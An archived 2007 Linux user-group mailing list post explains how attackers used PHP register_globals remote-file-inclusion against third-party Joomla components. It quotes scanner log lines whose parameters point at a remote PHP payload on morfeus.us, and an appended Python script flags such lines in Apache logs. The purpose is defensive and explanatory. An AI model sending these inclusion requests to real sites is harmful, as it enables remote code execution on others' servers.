PLUG site incident last night
JD Austin
jd at twingeckos.com
Mon Jan 1 17:25:44 MST 2007
Using url tricks crackers exploit in many types of web applications.
The register_globals feature in php is used to trick the site into using
a different configuration .php file in another location across the net
and run it. It's a trick as old as CGI.
Looking at my logs I see TONS of these types of attempts:
208.31.216.8 - - [01/Jan/2007:08:59:52 -0500] "GET /becommunity/community/index.php?pageurl=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:08:59:53 -0500] "GET /shoutbox/expanded.php?conf=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:08:59:56 -0500] "GET /dotproject/modules/tasks/addedit.php?root_dir=http://morfeus.us/M.php?&/ HTTP/1.1" 200 176 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:09:00:00 -0500] "GET /My_eGallery/public/displayCategory.php?basepath=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:09:02:09 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://morfeus.us/M.php?&/ HTTP/1.1" 403 1240 "-" "Morfeus FXXXing Scanner"
It was never an issue with Joomla itself but third party components and
modules coded by people less security minded have been exploited.
com_extcalendar, com_galeria a few others were commonly used to
overwrite the index.php and configuration.php files. From there they'd
use php to create and run shell scripts to do various malicious things.
Components should have this in them somewhere:
defined( '_VALID_MOS' ) or die( 'Restricted access' );
Since Joomla 1.0.11 this issue has been addressed using .htaccess and
re-coding to allow register globals to be turned off. Since Joomla is
used on a wide range of platforms (even windows) they still support the
old register_globals method of variables but try to coerce users into
setting it up right.
I also install mod_security to make that sort of attack stop in its tracks.
JD
Technomage wrote:
> this may sound like a stupid question on my part (sorry guys, I've been
> working lately, so I haven't kept up): what exactly was cracked on the site
> and how was it done?
>
> details would be greatly appreciated.
>
> thanks.
>
>
> On Monday 01 January 2007 04:29, Jim wrote:
>
>> Edward Norton wrote:
>>
>>> PLUG cracked AGAIN? Not surprising considering you guys wont consider
>>> anything other than a badly coded PHP CMS.
>>>
>> Ed,
>>
>> Apparently you know more about securing a site than the people who run
>> it. At least that's what your message implies. I have an idea. When
>> it's time for the next PLUG meeting, come out of the sewer, show up at
>> the meeting and offer to help secure the site.
>>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change you mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
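The log excerpt JD quotes is exactly the kind of thing a small log filter can pick out automatically: every probe carries a query-string parameter whose value is an absolute URL, which is what a remote-file-inclusion attempt against a register_globals-trusting include() looks like. The script below is an added example for this archive page, not code from the original post or from the Joomla project. It parses Apache combined-format lines, flags any parameter whose value starts with a remote scheme, and separates the 200 responses (the probed script existed) from the 404/403 ones (it did not). The five scanner lines are the ones from the post with their line wraps joined; the final "Mozilla/5.0" line is a constructed benign request for contrast, and the scheme list (http, https, ftp) is an assumption.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Apache "combined" log format, which is what the lines quoted in the post use.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A query-string value that is itself an absolute URL is the signature of a
# remote-file-inclusion probe against an include()/require() that trusts a
# register_globals variable. Scheme list is an assumption of this example.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Lines 1-5 are the scanner hits quoted in the post (wraps joined);
# line 6 is a constructed benign request so the filter has something to ignore.
SAMPLE_LOG = """\
208.31.216.8 - - [01/Jan/2007:08:59:52 -0500] "GET /becommunity/community/index.php?pageurl=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:08:59:53 -0500] "GET /shoutbox/expanded.php?conf=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:08:59:56 -0500] "GET /dotproject/modules/tasks/addedit.php?root_dir=http://morfeus.us/M.php?&/ HTTP/1.1" 200 176 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:09:00:00 -0500] "GET /My_eGallery/public/displayCategory.php?basepath=http://morfeus.us/M.php?&/ HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:09:02:09 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://morfeus.us/M.php?&/ HTTP/1.1" 403 1240 "-" "Morfeus FXXXing Scanner"
127.0.0.1 - - [01/Jan/2007:09:05:00 -0500] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_rfi_attempts(log_text):
    """Return one record per query parameter whose value is an absolute URL."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path, _, query = rec['target'].partition('?')
        # parse_qsl %-decodes, so an encoded "http%3A%2F%2F" value is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append({
                    'ip': rec['ip'],
                    'path': path,
                    'param': name,
                    'url': value,
                    'status': int(rec['status']),
                    'ua': rec['ua'],
                })
    return hits


def summarize(hits):
    """Count attempts per source IP and list the scripts that answered 200.

    A 404 or 403 means the probed component was not installed; a 200 means the
    script exists and that request is the one worth investigating first."""
    by_ip = Counter(h['ip'] for h in hits)
    served = sorted({h['path'] for h in hits if h['status'] == 200})
    return {'attempts_by_ip': dict(by_ip), 'paths_served_200': served}


if __name__ == '__main__':
    found = find_rfi_attempts(SAMPLE_LOG)
    for h in found:
        print(f"{h['ip']} {h['status']} {h['path']} {h['param']}={h['url']} ({h['ua']})")
    print(summarize(found))
```

Run against the sample it reports all five Morfeus lines from one source and singles out /dotproject/modules/tasks/addedit.php as the only probed script that actually answered 200. A filter like this is for triage after the fact; it does not replace turning register_globals off and the mod_security rules JD mentions, which stop the request before the include() ever runs.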